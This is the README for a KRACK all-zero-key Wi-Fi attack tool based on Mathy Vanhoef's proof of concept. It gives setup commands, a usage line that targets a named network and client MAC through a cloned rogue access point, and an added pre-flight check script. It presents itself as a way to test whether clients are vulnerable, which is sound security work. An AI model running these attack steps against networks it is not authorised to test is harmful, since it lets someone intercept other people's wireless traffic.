This code is based on code written by Mathy Vanhoef (https://github.com/vanhoefm/krackattacks-poc-zerokey). Please read README.md before using it. Enjoy!
This code only works against clients that install an all-zero TK (pairwise temporal key) under a KRACK attack, i.e. when a retransmitted message 3 of the 4-way handshake is delivered to the client. Use this tool to verify whether a client is vulnerable to that attack.
This code was tested with the following equipment:
Attacker:
Client Attacked:
Access Point:
Install the following dependencies on Kali Linux:
$ sudo apt update
$ sudo apt install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome
Then install the following Python package:
$ pip install --user mitm_channel_based
Then disable hardware encryption with the script ./disable-hwcrypto.sh. It is recommended to reboot after running this script. After plugging in your Wi-Fi NIC, use systool -vm ath9k_htc (or the equivalent for your driver) to confirm that the nohwcrypt (or similar) module parameter has been set; the attack relies on software encryption, so with hardware encryption still enabled the tool will not work.
Below is an example of the tool's command line usage, followed by an explanation of the arguments:
$ sudo ./krackattack/krack_all_zero_tk.py wlan1 wlan0 usb0 "Familia Couto" -t 00:21:5d:ea:fe:be
wlan1: interface that listens on, and injects packets into, the real channel
wlan0: interface that runs the rogue AP
usb0: interface that provides internet access
"Familia Couto": SSID of the target network
-t 00:21:5d:ea:fe:be: MAC address of the attacked client
Run ./krackattack/krack_all_zero_tk.py -h for the full list of options.
Warnings
If the Wi-Fi interfaces are blocked by rfkill, unblock them before running the tool:
$ rfkill unblock wifi
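The preparation steps above (interfaces present, hardware encryption disabled, radios not rfkill-blocked) are easy to get wrong and the tool gives little feedback when they are. The following pre-flight script is an added example and is not part of this repository or of Mathy Vanhoef's original; it assumes the standard Linux sysfs layout (/sys/module/<module>/parameters/nohwcrypt, /sys/class/net/<iface>, /sys/class/rfkill/rfkillN/{soft,hard,type}) and defaults to the ath9k_htc module named in the text. The function names and the optional path arguments (used so each check can be exercised against a temporary directory) are my own.

```shell
#!/usr/bin/env bash
# Added example: pre-flight checks for the krack_all_zero_tk.py setup.
# Not part of the original tool; assumes the standard sysfs layout.

# Return 0 if the module-parameter file at $1 says hardware crypto is
# disabled (ath9k_htc exposes nohwcrypt as an int, other drivers as Y/N).
# Returns 2 if the file is missing or unreadable (module not loaded?).
hwcrypto_disabled() {
    local file="$1" val
    [ -r "$file" ] || return 2
    read -r val < "$file" || return 2
    case "$val" in
        1|Y|y) return 0 ;;
        *)     return 1 ;;
    esac
}

# Return 0 if network interface $1 exists under $2 (default /sys/class/net).
iface_exists() {
    local name="$1" root="${2:-/sys/class/net}"
    [ -d "$root/$name" ]
}

# Return 0 if the rfkill device directory $1 is neither soft- nor hard-blocked.
# A soft block is what "rfkill unblock wifi" clears; a hard block is a
# physical switch and cannot be fixed from software.
rfkill_unblocked() {
    local dir="$1" soft hard
    read -r soft < "$dir/soft" || return 2
    read -r hard < "$dir/hard" || return 2
    [ "$soft" = 0 ] && [ "$hard" = 0 ]
}

# preflight REAL_IFACE ROGUE_IFACE INET_IFACE [MODULE]
# Prints one line per check and returns non-zero if any check failed.
preflight() {
    local real="$1" rogue="$2" inet="$3" mod="${4:-ath9k_htc}" rc=0 i d

    for i in "$real" "$rogue" "$inet"; do
        if iface_exists "$i"; then
            echo "ok:   interface $i present"
        else
            echo "FAIL: interface $i not found"; rc=1
        fi
    done

    if hwcrypto_disabled "/sys/module/$mod/parameters/nohwcrypt"; then
        echo "ok:   $mod nohwcrypt is set"
    else
        echo "FAIL: $mod nohwcrypt not set (run ./disable-hwcrypto.sh and reboot)"; rc=1
    fi

    # Only wireless radios matter here; skip bluetooth and other rfkill types.
    for d in /sys/class/rfkill/rfkill*; do
        [ -d "$d" ] || continue
        [ "$(cat "$d/type")" = wlan ] || continue
        if rfkill_unblocked "$d"; then
            echo "ok:   $(cat "$d/name") unblocked"
        else
            echo "FAIL: $(cat "$d/name") blocked (try: rfkill unblock wifi)"; rc=1
        fi
    done

    return $rc
}

# Run the checks only when executed directly with the three interface names,
# e.g.:  sudo ./preflight.sh wlan1 wlan0 usb0
if [ "${BASH_SOURCE[0]}" = "$0" ] && [ $# -ge 3 ]; then
    preflight "$@"
    exit $?
fi
```

Each check is a separate function that takes its sysfs path as an argument, so the same logic can be pointed at a scratch directory to confirm it behaves as expected before trusting it on the attack machine.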
Files Generated
After running the script for the first time, the following new files are generated:
dnsmasq.conf: configuration file for the DHCP and DNS services
dnsmasq_log: output from dnsmasq
hostapd_rogue.conf: configuration file for the rogue AP, cloned from the real AP
hostapd_rogue.log: output from hostapd_rogue
rogue_ap_capture.pcap: packets captured on the rogue AP interface
Demonstration Video
The following link contains a video that demonstrates this attack: demonstration video